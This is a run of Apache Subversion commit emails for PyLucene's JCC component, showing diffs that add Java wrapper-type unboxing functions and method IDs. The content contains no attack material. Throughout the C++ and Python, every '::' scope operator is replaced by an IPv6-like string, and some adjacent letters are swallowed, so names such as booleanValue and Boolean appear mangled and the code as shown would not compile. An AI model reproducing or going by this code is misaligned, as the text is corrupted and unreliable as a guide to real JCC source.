lucene/pylucene/trunk/jcc/_jcc/java/lang/__init__.cpp Mon Apr 5 20:52:13 2010 @@ -25,9 +25,13 @@ namespace java { extern PyTypeObject Exception$$Type; extern PyTypeObject RuntimeException$$Type; extern PyTypeObject Boolean$$Type; + extern PyTypeObject Byte$$Type; + extern PyTypeObject Character$$Type; extern PyTypeObject Integer$$Type; - extern PyTypeObject Long$$Type; extern PyTypeObject Double$$Type; + extern PyTypeObject Float$$Type; + extern PyTypeObject Long$$Type; + extern PyTypeObject Short$$Type; namespace reflect { void __install__(PyObject *module); @@ -42,9 +46,13 @@ namespace java { INSTALL_TYPE(Exception, m); INSTALL_TYPE(RuntimeException, m); INSTALL_TYPE(Boolean, m); + INSTALL_TYPE(Byte, m); + INSTALL_TYPE(Character, m); + INSTALL_TYPE(Double, m); + INSTALL_TYPE(Float, m); INSTALL_TYPE(Integer, m); INSTALL_TYPE(Long, m); - INSTALL_TYPE(Double, m); + INSTALL_TYPE(Short, m); reflectacf:4db6:5e0b:f386:43a5:35d7:718d:3c8b__install__(m); } } Modified: lucene/pylucene/trunk/jcc/jcc/python.py URL: http://svn.apache.org/viewvc/lucene/pylucene/trunk/jcc/jcc/python.py?rev=930958&r1=930957&r2=930958&view=diff ============================================================================== --- lucene/pylucene/trunk/jcc/jcc/python.py (original) +++ lucene/pylucene/trunk/jcc/jcc/python.py Mon Apr 5 20:52:13 2010 @@ -32,7 +32,7 @@ if python_ver < '2.4': RESULTS = { 'boolean': 'Py_RETURN_BOOL(%s);', - 'byte': 'return PyInt_FromLong(%s);', + 'byte': 'return PyInt_FromLong((long) %s);', 'char': 'return PyUnicode_FromUnicode((Py_UNICODE *) &%s, 1);', 'double': 'return PyFloat_FromDouble((double) %s);', 'float': 'return PyFloat_FromDouble((double) %s);', @@ -51,6 +51,16 @@ CALLARGS = { 'boolean': ('O', '(%s ? Py_ 'short': ('i', '(int) %s', False), 'java.lang.String': ('O', 'env->fromJString((jstring) %s, 0)', True) } +BOXED = set(('java.lang.Boolean', + 'java.lang.Byte', + 'java.lang.Char', + 'java.lang.Double', + 'java.lang.Float', + 'java.lang.Integer', + 'java.lang.Long', + 'java.lang.Short', + 'java.lang.String')) + def getTypeParameters(cls): @@ -971,8 +981,12 @@ def python(env, out_h, out, cls, superCl line(out, indent, '{') line(out, indent + 1, 'PyDict_SetItemString(%s$$Type.tp_dict, "class_", make_descriptor(%sacf:4db6:5e0b:f386:43a5:35d7:718d:3c8binitializeClass, %s));', names[-1], cppname(names[-1]), generics and 1 or 0) - line(out, indent + 1, 'PyDict_SetItemString(%s$$Type.tp_dict, "wrapfn_", make_descriptor(t_%sacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bwrap_jobject));', - names[-1], names[-1]) + + if cls.getName() in BOXED: + wrapfn_ = "unbox%s" %(names[-1]) + else: + wrapfn_ = "t_%sacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bwrap_jobject" %(names[-1]) + line(out, indent + 1, 'PyDict_SetItemString(%s$$Type.tp_dict, "wrapfn_", make_descriptor(%s));', names[-1], wrapfn_) if isExtension: line(out, indent + 1, 'jclass cls = %sacf:4db6:5e0b:f386:43a5:35d7:718d:3c8binitializeClass();', Modified: lucene/pylucene/trunk/jcc/jcc/sources/JCCEnv.cpp URL: http://svn.apache.org/viewvc/lucene/pylucene/trunk/jcc/jcc/sources/JCCEnv.cpp?rev=930958&r1=930957&r2=930958&view=diff ============================================================================== --- lucene/pylucene/trunk/jcc/jcc/sources/JCCEnv.cpp (original) +++ lucene/pylucene/trunk/jcc/jcc/sources/JCCEnv.cpp Mon Apr 5 20:52:13 2010 @@ -89,6 +89,16 @@ void JCCEnvacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bset_vm(JavaVM *vm, JNIEnv * #else _thr = (jclass) vm_env->NewGlobalRef(vm_env->FindClass("java/lang/RuntimeException")); #endif + + _Boolean = (jclass) vm_env->NewGlobalRef(vm_env->FindClass("java/lang/Boolean")); + _Byte = (jclass) vm_env->NewGlobalRef(vm_env->FindClass("java/lang/Byte")); + _Character = (jclass) vm_env->NewGlobalRef(vm_env->FindClass("java/lang/Character")); + _Double = (jclass) vm_env->NewGlobalRef(vm_env->FindClass("java/lang/Double")); + _Float = (jclass) vm_env->NewGlobalRef(vm_env->FindClass("java/lang/Float")); + _Integer = (jclass) vm_env->NewGlobalRef(vm_env->FindClass("java/lang/Integer")); + _Long = (jclass) vm_env->NewGlobalRef(vm_env->FindClass("java/lang/Long")); + _Short = (jclass) vm_env->NewGlobalRef(vm_env->FindClass("java/lang/Short")); + _mids = new jmethodID[max_mid]; _mids[mid_sys_identityHashCode] = @@ -116,6 +126,23 @@ void JCCEnvacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bset_vm(JavaVM *vm, JNIEnv * _mids[mid_enumeration_nextElement] = vm_env->GetMethodID(vm_env->FindClass("java/util/Enumeration"), "nextElement", "()Ljava/lang/Object;"); + + _mids[mid_Boolean_booleanValue] = + vm_env->GetMethodID(_Boolean, "booleanValue", "()Z"); + _mids[mid_Byte_byteValue] = + vm_env->GetMethodID(_Byte, "byteValue", "()B"); + _mids[mid_Character_charValue] = + vm_env->GetMethodID(_Character, "charValue", "()C"); + _mids[mid_Double_doubleValue] = + vm_env->GetMethodID(_Double, "doubleValue", "()D"); + _mids[mid_Float_floatValue] = + vm_env->GetMethodID(_Float, "floatValue", "()F"); + _mids[mid_Integer_intValue] = + vm_env->GetMethodID(_Integer, "intValue", "()I"); + _mids[mid_Long_longValue] = + vm_env->GetMethodID(_Long, "longValue", "()J"); + _mids[mid_Short_shortValue] = + vm_env->GetMethodID(_Short, "shortValue", "()S"); } #if defined(_MSC_VER) || defined(__WIN32) @@ -160,7 +187,7 @@ jobject JCCEnvacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bnumerationNext(jobject return callObjectMethod(obj, _mids[mid_enumeration_nextElement]); } -jboolean JCCEnvacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bisInstanceOf(jobject obj, jclass (*initializeClass)()) +jboolean JCCEnvacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bisInstanceOf(jobject obj, getclassfn initializeClass) const { return get_vm_env()->IsInstanceOf(obj, (*initializeClass)()); } @@ -290,7 +317,7 @@ jobject JCCEnvacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bleteGlobalRef(jobject return NULL; } -jobject JCCEnvacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bnewObject(jclass (*initializeClass)(), jmethodID **mids, +jobject JCCEnvacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bnewObject(getclassfn initializeClass, jmethodID **mids, int m, ...) { jclass cls = (*initializeClass)(); @@ -507,6 +534,47 @@ void JCCEnvacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bllStaticVoidMethod(jclass } +jboolean JCCEnvacf:4db6:5e0b:f386:43a5:35d7:718d:3c8booleanValue(jobject obj) const +{ + return get_vm_env()->CallBooleanMethod(obj, _mids[mid_Boolean_booleanValue]); +} + +jbyte JCCEnvacf:4db6:5e0b:f386:43a5:35d7:718d:3c8byteValue(jobject obj) const +{ + return get_vm_env()->CallByteMethod(obj, _mids[mid_Byte_byteValue]); +} + +jchar JCCEnvacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bharValue(jobject obj) const +{ + return get_vm_env()->CallCharMethod(obj, _mids[mid_Character_charValue]); +} + +jdouble JCCEnvacf:4db6:5e0b:f386:43a5:35d7:718d:3c8boubleValue(jobject obj) const +{ + return get_vm_env()->CallDoubleMethod(obj, _mids[mid_Double_doubleValue]); +} + +jfloat JCCEnvacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bloatValue(jobject obj) const +{ + return get_vm_env()->CallFloatMethod(obj, _mids[mid_Float_floatValue]); +} + +jint JCCEnvacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bintValue(jobject obj) const +{ + return get_vm_env()->CallIntMethod(obj, _mids[mid_Integer_intValue]); +} + +jlong JCCEnvacf:4db6:5e0b:f386:43a5:35d7:718d:3c8blongValue(jobject obj) const +{ + return get_vm_env()->CallLongMethod(obj, _mids[mid_Long_longValue]); +} + +jshort JCCEnvacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bshortValue(jobject obj) const +{ + return get_vm_env()->CallShortMethod(obj, _mids[mid_Short_shortValue]); +} + + jmethodID JCCEnvacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bgetMethodID(jclass cls, const char *name, const char *signature) const { Modified: lucene/pylucene/trunk/jcc/jcc/sources/JCCEnv.h URL: http://svn.apache.org/viewvc/lucene/pylucene/trunk/jcc/jcc/sources/JCCEnv.h?rev=930958&r1=930957&r2=930958&view=diff ============================================================================== --- lucene/pylucene/trunk/jcc/jcc/sources/JCCEnv.h (original) +++ lucene/pylucene/trunk/jcc/jcc/sources/JCCEnv.h Mon Apr 5 20:52:13 2010 @@ -67,6 +67,7 @@ extern JCCEnv *env; #endif +typedef jclass (*getclassfn)(void); class countedRef { public: @@ -77,6 +78,7 @@ public: class _DLL_EXPORT JCCEnv { protected: jclass _sys, _obj, _thr; + jclass _Boolean, _Byte, _Character, _Double, _Float, _Integer, _Long, _Short; jmethodID *_mids; enum { @@ -88,6 +90,14 @@ protected: mid_obj_getClass, mid_iterator_next, mid_enumeration_nextElement, + mid_Boolean_booleanValue, + mid_Byte_byteValue, + mid_Character_charValue, + mid_Double_doubleValue, + mid_Float_floatValue, + mid_Integer_intValue, + mid_Long_longValue, + mid_Short_shortValue, max_mid }; @@ -137,7 +147,8 @@ public: virtual jstring getJavaVersion() const; virtual jclass findClass(const char *className) const; - virtual jboolean isInstanceOf(jobject obj, jclass (*initializeClass)()); + virtual jboolean isInstanceOf(jobject obj, + getclassfn initializeClass) const; virtual void registerNatives(jclass cls, JNINativeMethod *methods, int n) const; @@ -148,7 +159,7 @@ public: virtual jobject newGlobalRef(jobject obj, int id); virtual jobject deleteGlobalRef(jobject obj, int id); - virtual jobject newObject(jclass (*initializeClass)(), jmethodID **mids, + virtual jobject newObject(getclassfn initializeClass, jmethodID **mids, int m, ...); virtual jobjectArray newObjectArray(jclass cls, int size); @@ -212,6 +223,15 @@ public: virtual void callStaticVoidMethod(jclass cls, jmethodID mid, ...) const; + virtual jboolean booleanValue(jobject obj) const; + virtual jbyte byteValue(jobject obj) const; + virtual jchar charValue(jobject obj) const; + virtual jdouble doubleValue(jobject obj) const; + virtual jfloat floatValue(jobject obj) const; + virtual jint intValue(jobject obj) const; + virtual jlong longValue(jobject obj) const; + virtual jshort shortValue(jobject obj) const; + virtual jmethodID getMethodID(jclass cls, const char *name, const char *signature) const; virtual jfieldID getFieldID(jclass cls, const char *name, Modified: lucene/pylucene/trunk/jcc/jcc/sources/functions.cpp URL: http://svn.apache.org/viewvc/lucene/pylucene/trunk/jcc/jcc/sources/functions.cpp?rev=930958&r1=930957&r2=930958&view=diff ============================================================================== --- lucene/pylucene/trunk/jcc/jcc/sources/functions.cpp (original) +++ lucene/pylucene/trunk/jcc/jcc/sources/functions.cpp Mon Apr 5 20:52:13 2010 @@ -20,9 +20,13 @@ #include "java/lang/String.h" #include "java/lang/Throwable.h" #include "java/lang/Boolean.h" +#include "java/lang/Byte.h" +#include "java/lang/Character.h" +#include "java/lang/Double.h" +#include "java/lang/Float.h" #include "java/lang/Integer.h" #include "java/lang/Long.h" -#include "java/lang/Double.h" +#include "java/lang/Short.h" #include "java/util/Iterator.h" #include "JArray.h" #include "functions.h" @@ -1156,26 +1160,12 @@ PyObject *castCheck(PyObject *obj, getcl jobject jobj = ((t_Object *) obj)->object.this$; - if (jobj) + if (jobj && !env->isInstanceOf(jobj, initializeClass)) { - jclass cls; - - try { - cls = (*initializeClass)(); - } catch (JCCEnvacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bpythonError e) { - return NULL; - } catch (JCCEnvacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bxception e) { - PyErr_SetJavaError(e.throwable); - return NULL; - } - - if (!env->get_vm_env()->IsInstanceOf(jobj, cls)) - { - if (reportError) - PyErr_SetObject(PyExc_TypeError, obj); + if (reportError) + PyErr_SetObject(PyExc_TypeError, obj); - return NULL; - } + return NULL; } return obj; @@ -1291,6 +1281,163 @@ PyObject *wrapType(PyTypeObject *type, c return wrapfn(obj); } +PyObject *unboxBoolean(const jobject& obj) +{ + if (obj != NULL) + { + if (!env->isInstanceOf(obj, javacf:4db6:5e0b:f386:43a5:35d7:718d:3c8blangacf:4db6:5e0b:f386:43a5:35d7:718d:3c8booleanacf:4db6:5e0b:f386:43a5:35d7:718d:3c8binitializeClass)) + { + PyErr_SetObject(PyExc_TypeError, + (PyObject *) &javacf:4db6:5e0b:f386:43a5:35d7:718d:3c8blangacf:4db6:5e0b:f386:43a5:35d7:718d:3c8boolean$$Type); + return NULL; + } + + if (env->booleanValue(obj)) + Py_RETURN_TRUE; + + Py_RETURN_FALSE; + } + + Py_RETURN_NONE; +} + +PyObject *unboxByte(const jobject &obj) +{ + if (obj != NULL) + { + if (!env->isInstanceOf(obj, javacf:4db6:5e0b:f386:43a5:35d7:718d:3c8blangacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bytacf:4db6:5e0b:f386:43a5:35d7:718d:3c8binitializeClass)) + { + PyErr_SetObject(PyExc_TypeError, + (PyObject *) &javacf:4db6:5e0b:f386:43a5:35d7:718d:3c8blangacf:4db6:5e0b:f386:43a5:35d7:718d:3c8byte$$Type); + return NULL; + } + + return PyInt_FromLong((long) env->byteValue(obj)); + } + + Py_RETURN_NONE; +} + +PyObject *unboxChar(const jobject &obj) +{ + if (obj != NULL) + { + if (!env->isInstanceOf(obj, javacf:4db6:5e0b:f386:43a5:35d7:718d:3c8blangacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bharacteracf:4db6:5e0b:f386:43a5:35d7:718d:3c8binitializeClass)) + { + PyErr_SetObject(PyExc_TypeError, + (PyObject *) &javacf:4db6:5e0b:f386:43a5:35d7:718d:3c8blangacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bharacter$$Type); + return NULL; + } + + jchar c = env->charValue(obj); + return PyUnicode_FromUnicode((Py_UNICODE *) &c, 1); + } + + Py_RETURN_NONE; +} + +PyObject *unboxDouble(const jobject &obj) +{ + if (obj != NULL) + { + if (!env->isInstanceOf(obj, javacf:4db6:5e0b:f386:43a5:35d7:718d:3c8blangacf:4db6:5e0b:f386:43a5:35d7:718d:3c8boublacf:4db6:5e0b:f386:43a5:35d7:718d:3c8binitializeClass)) + { + PyErr_SetObject(PyExc_TypeError, + (PyObject *) &javacf:4db6:5e0b:f386:43a5:35d7:718d:3c8blangacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bouble$$Type); + return NULL; + } + + return PyFloat_FromDouble((double) env->doubleValue(obj)); + } + + Py_RETURN_NONE; +} + +PyObject *unboxFloat(const jobject &obj) +{ + if (obj != NULL) + { + if (!env->isInstanceOf(obj, javacf:4db6:5e0b:f386:43a5:35d7:718d:3c8blangacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bloatacf:4db6:5e0b:f386:43a5:35d7:718d:3c8binitializeClass)) + { + PyErr_SetObject(PyExc_TypeError, + (PyObject *) &javacf:4db6:5e0b:f386:43a5:35d7:718d:3c8blangacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bloat$$Type); + return NULL; + } + + return PyFloat_FromDouble((double) env->floatValue(obj)); + } + + Py_RETURN_NONE; +} + +PyObject *unboxInteger(const jobject &obj) +{ + if (obj != NULL) + { + if (!env->isInstanceOf(obj, javacf:4db6:5e0b:f386:43a5:35d7:718d:3c8blangacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bIntegeracf:4db6:5e0b:f386:43a5:35d7:718d:3c8binitializeClass)) + { + PyErr_SetObject(PyExc_TypeError, + (PyObject *) &javacf:4db6:5e0b:f386:43a5:35d7:718d:3c8blangacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bInteger$$Type); + return NULL; + } + + return PyInt_FromLong((long) env->intValue(obj)); + } + + Py_RETURN_NONE; +} + +PyObject *unboxLong(const jobject &obj) +{ + if (obj != NULL) + { + if (!env->isInstanceOf(obj, javacf:4db6:5e0b:f386:43a5:35d7:718d:3c8blangacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bLongacf:4db6:5e0b:f386:43a5:35d7:718d:3c8binitializeClass)) + { + PyErr_SetObject(PyExc_TypeError, + (PyObject *) &javacf:4db6:5e0b:f386:43a5:35d7:718d:3c8blangacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bLong$$Type); + return NULL; + } + + return PyLong_FromLongLong((PY_LONG_LONG) env->longValue(obj)); + } + + Py_RETURN_NONE; +} + +PyObject *unboxShort(const jobject &obj) +{ + if (obj != NULL) + { + if (!env->isInstanceOf(obj, javacf:4db6:5e0b:f386:43a5:35d7:718d:3c8blangacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bShortacf:4db6:5e0b:f386:43a5:35d7:718d:3c8binitializeClass)) + { + PyErr_SetObject(PyExc_TypeError, + (PyObject *) &javacf:4db6:5e0b:f386:43a5:35d7:718d:3c8blangacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bShort$$Type); + return NULL; + } + + return PyInt_FromLong((long) env->shortValue(obj)); + } + + Py_RETURN_NONE; +} + +PyObject *unboxString(const jobject &obj) +{ + if (obj != NULL) + { + if (!env->isInstanceOf(obj, javacf:4db6:5e0b:f386:43a5:35d7:718d:3c8blangacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bStringacf:4db6:5e0b:f386:43a5:35d7:718d:3c8binitializeClass)) + { + PyErr_SetObject(PyExc_TypeError, + (PyObject *) &javacf:4db6:5e0b:f386:43a5:35d7:718d:3c8blangacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bString$$Type); + return NULL; + } + + return env->fromJString((jstring) obj, 0); + } + + Py_RETURN_NONE; +} + #ifdef _java_generics PyObject *typeParameters(PyTypeObject *types[], size_t size) { Modified: lucene/pylucene/trunk/jcc/jcc/sources/functions.h URL: http://svn.apache.org/viewvc/lucene/pylucene/trunk/jcc/jcc/sources/functions.h?rev=930958&r1=930957&r2=930958&view=diff ============================================================================== --- lucene/pylucene/trunk/jcc/jcc/sources/functions.h (original) +++ lucene/pylucene/trunk/jcc/jcc/sources/functions.h Mon Apr 5 20:52:13 2010 @@ -30,7 +30,6 @@ typedef intobjargproc ssizeobjargproc; typedef intintobjargproc ssizessizeobjargproc; #endif -typedef jclass (*getclassfn)(void); typedef PyTypeObject **(*getparametersfn)(void *); PyObject *PyErr_SetArgsError(char *name, PyObject *args); @@ -72,6 +71,16 @@ int _parseArgs(PyObject **args, unsigned int abstract_init(PyObject *self, PyObject *args, PyObject *kwds); PyObject *wrapType(PyTypeObject *type, const jobject& obj); +PyObject *unboxBoolean(const jobject& obj); +PyObject *unboxByte(const jobject &obj); +PyObject *unboxChar(const jobject &obj); +PyObject *unboxDouble(const jobject &obj); +PyObject *unboxFloat(const jobject &obj); +PyObject *unboxInteger(const jobject &obj); +PyObject *unboxLong(const jobject &obj); +PyObject *unboxShort(const jobject &obj); +PyObject *unboxString(const jobject &obj); + PyObject *j2p(const javacf:4db6:5e0b:f386:43a5:35d7:718d:3c8blangacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bString& js); javacf:4db6:5e0b:f386:43a5:35d7:718d:3c8blangacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bString p2j(PyObject *object); From [email protected] Mon Apr 05 21:18:39 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 14868 invoked from network); 5 Apr 2010 21:18:39 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 5 Apr 2010 21:18:39 -0000 Received: (qmail 70601 invoked by uid 500); 5 Apr 2010 21:18:39 -0000 Delivered-To: [email protected] Received: (qmail 70583 invoked by uid 500); 5 Apr 2010 21:18:39 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <pylucene-commits.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 70575 invoked by uid 99); 5 Apr 2010 21:18:39 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 05 Apr 2010 21:18:39 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 05 Apr 2010 21:18:36 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id BE19B23888CC; Mon, 5 Apr 2010 21:18:15 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r930963 - in /lucene/pylucene/trunk/jcc/jcc/sources: JCCEnv.cpp JCCEnv.h Date: Mon, 05 Apr 2010 21:18:15 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org Author: vajda Date: Mon Apr 5 21:18:15 2010 New Revision: 930963 URL: http://svn.apache.org/viewvc?rev=930963&view=rev Log: removed some jclass from JCCEnv Modified: lucene/pylucene/trunk/jcc/jcc/sources/JCCEnv.cpp lucene/pylucene/trunk/jcc/jcc/sources/JCCEnv.h Modified: lucene/pylucene/trunk/jcc/jcc/sources/JCCEnv.cpp URL: http://svn.apache.org/viewvc/lucene/pylucene/trunk/jcc/jcc/sources/JCCEnv.cpp?rev=930963&r1=930962&r2=930963&view=diff ============================================================================== --- lucene/pylucene/trunk/jcc/jcc/sources/JCCEnv.cpp (original) +++ lucene/pylucene/trunk/jcc/jcc/sources/JCCEnv.cpp Mon Apr 5 21:18:15 2010 @@ -90,15 +90,6 @@ void JCCEnvacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bset_vm(JavaVM *vm, JNIEnv * _thr = (jclass) vm_env->NewGlobalRef(vm_env->FindClass("java/lang/RuntimeException")); #endif - _Boolean = (jclass) vm_env->NewGlobalRef(vm_env->FindClass("java/lang/Boolean")); - _Byte = (jclass) vm_env->NewGlobalRef(vm_env->FindClass("java/lang/Byte")); - _Character = (jclass) vm_env->NewGlobalRef(vm_env->FindClass("java/lang/Character")); - _Double = (jclass) vm_env->NewGlobalRef(vm_env->FindClass("java/lang/Double")); - _Float = (jclass) vm_env->NewGlobalRef(vm_env->FindClass("java/lang/Float")); - _Integer = (jclass) vm_env->NewGlobalRef(vm_env->FindClass("java/lang/Integer")); - _Long = (jclass) vm_env->NewGlobalRef(vm_env->FindClass("java/lang/Long")); - _Short = (jclass) vm_env->NewGlobalRef(vm_env->FindClass("java/lang/Short")); - _mids = new jmethodID[max_mid]; _mids[mid_sys_identityHashCode] = @@ -128,21 +119,29 @@ void JCCEnvacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bset_vm(JavaVM *vm, JNIEnv * "nextElement", "()Ljava/lang/Object;"); _mids[mid_Boolean_booleanValue] = - vm_env->GetMethodID(_Boolean, "booleanValue", "()Z"); + vm_env->GetMethodID(vm_env->FindClass("java/lang/Boolean"), + "booleanValue", "()Z"); _mids[mid_Byte_byteValue] = - vm_env->GetMethodID(_Byte, "byteValue", "()B"); + vm_env->GetMethodID(vm_env->FindClass("java/lang/Byte"), + "byteValue", "()B"); _mids[mid_Character_charValue] = - vm_env->GetMethodID(_Character, "charValue", "()C"); + vm_env->GetMethodID(vm_env->FindClass("java/lang/Character"), + "charValue", "()C"); _mids[mid_Double_doubleValue] = - vm_env->GetMethodID(_Double, "doubleValue", "()D"); + vm_env->GetMethodID(vm_env->FindClass("java/lang/Double"), + "doubleValue", "()D"); _mids[mid_Float_floatValue] = - vm_env->GetMethodID(_Float, "floatValue", "()F"); + vm_env->GetMethodID(vm_env->FindClass("java/lang/Float"), + "floatValue", "()F"); _mids[mid_Integer_intValue] = - vm_env->GetMethodID(_Integer, "intValue", "()I"); + vm_env->GetMethodID(vm_env->FindClass("java/lang/Integer"), + "intValue", "()I"); _mids[mid_Long_longValue] = - vm_env->GetMethodID(_Long, "longValue", "()J"); + vm_env->GetMethodID(vm_env->FindClass("java/lang/Long"), + "longValue", "()J"); _mids[mid_Short_shortValue] = - vm_env->GetMethodID(_Short, "shortValue", "()S"); + vm_env->GetMethodID(vm_env->FindClass("java/lang/Short"), + "shortValue", "()S"); } #if defined(_MSC_VER) || defined(__WIN32) Modified: lucene/pylucene/trunk/jcc/jcc/sources/JCCEnv.h URL: http://svn.apache.org/viewvc/lucene/pylucene/trunk/jcc/jcc/sources/JCCEnv.h?rev=930963&r1=930962&r2=930963&view=diff ============================================================================== --- lucene/pylucene/trunk/jcc/jcc/sources/JCCEnv.h (original) +++ lucene/pylucene/trunk/jcc/jcc/sources/JCCEnv.h Mon Apr 5 21:18:15 2010 @@ -78,7 +78,6 @@ public: class _DLL_EXPORT JCCEnv { protected: jclass _sys, _obj, _thr; - jclass _Boolean, _Byte, _Character, _Double, _Float, _Integer, _Long, _Short; jmethodID *_mids; enum { From [email protected] Tue Apr 06 05:04:37 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 96354 invoked from network); 6 Apr 2010 05:04:36 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 6 Apr 2010 05:04:36 -0000 Received: (qmail 97653 invoked by uid 500); 6 Apr 2010 05:04:36 -0000 Delivered-To: [email protected] Received: (qmail 97636 invoked by uid 500); 6 Apr 2010 05:04:36 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <pylucene-commits.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 97628 invoked by uid 99); 6 Apr 2010 05:04:35 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 06 Apr 2010 05:04:35 +0000 X-ASF-Spam-Status: No, hits=-1282.1 required=10.0 tests=ALL_TRUSTED,AWL X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 06 Apr 2010 05:04:33 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id 7CB292388900; Tue, 6 Apr 2010 05:04:13 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r931019 - in /lucene/pylucene/trunk/jcc: ./ _jcc/java/lang/ jcc/ jcc/sources/ Date: Tue, 06 Apr 2010 05:04:13 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> Author: vajda Date: Tue Apr 6 05:04:12 2010 New Revision: 931019 URL: http://svn.apache.org/viewvc?rev=931019&view=rev Log: - improved auto-boxing of primitive type parameters into their class Modified: lucene/pylucene/trunk/jcc/CHANGES lucene/pylucene/trunk/jcc/_jcc/java/lang/Boolean.cpp lucene/pylucene/trunk/jcc/_jcc/java/lang/Boolean.h lucene/pylucene/trunk/jcc/_jcc/java/lang/Byte.cpp lucene/pylucene/trunk/jcc/_jcc/java/lang/Byte.h lucene/pylucene/trunk/jcc/_jcc/java/lang/Character.cpp lucene/pylucene/trunk/jcc/_jcc/java/lang/Character.h lucene/pylucene/trunk/jcc/_jcc/java/lang/Float.cpp lucene/pylucene/trunk/jcc/_jcc/java/lang/Float.h lucene/pylucene/trunk/jcc/_jcc/java/lang/Short.cpp lucene/pylucene/trunk/jcc/_jcc/java/lang/Short.h lucene/pylucene/trunk/jcc/jcc/python.py lucene/pylucene/trunk/jcc/jcc/sources/functions.cpp lucene/pylucene/trunk/jcc/jcc/sources/functions.h lucene/pylucene/trunk/jcc/jcc/sources/types.cpp Modified: lucene/pylucene/trunk/jcc/CHANGES URL: http://svn.apache.org/viewvc/lucene/pylucene/trunk/jcc/CHANGES?rev=931019&r1=931018&r2=931019&view=diff ============================================================================== --- lucene/pylucene/trunk/jcc/CHANGES (original) +++ lucene/pylucene/trunk/jcc/CHANGES Tue Apr 6 05:04:12 2010 @@ -11,6 +11,7 @@ Version 2.5 -> - added support for of_() method to set instance type parameters - fixed bug with not heeding type parameter for --sequence get method - parameterized return values are now unboxed + - improved auto-boxing of primitive type parameters into their class - Version 2.4 -> 2.5 Modified: lucene/pylucene/trunk/jcc/_jcc/java/lang/Boolean.cpp URL: http://svn.apache.org/viewvc/lucene/pylucene/trunk/jcc/_jcc/java/lang/Boolean.cpp?rev=931019&r1=931018&r2=931019&view=diff ============================================================================== --- lucene/pylucene/trunk/jcc/_jcc/java/lang/Boolean.cpp (original) +++ lucene/pylucene/trunk/jcc/_jcc/java/lang/Boolean.cpp Tue Apr 6 05:04:12 2010 @@ -22,6 +22,7 @@ namespace java { namespace lang { enum { + mid__init_, mid_booleanValue, max_mid }; @@ -39,9 +40,9 @@ namespace java { jclass cls = env->findClass("java/lang/Boolean"); _mids = new jmethodID[max_mid]; + _mids[mid__init_] = env->getMethodID(cls, "<init>", "(Z)V"); _mids[mid_booleanValue] = - env->getMethodID(cls, "booleanValue", - "()Z"); + env->getMethodID(cls, "booleanValue", "()Z"); class$ = (Class *) new JObject(cls); @@ -52,6 +53,9 @@ namespace java { return (jclass) class$->this$; } + Booleanacf:4db6:5e0b:f386:43a5:35d7:718d:3c8boolean(jboolean b) : Object(env->newObject(initializeClass, 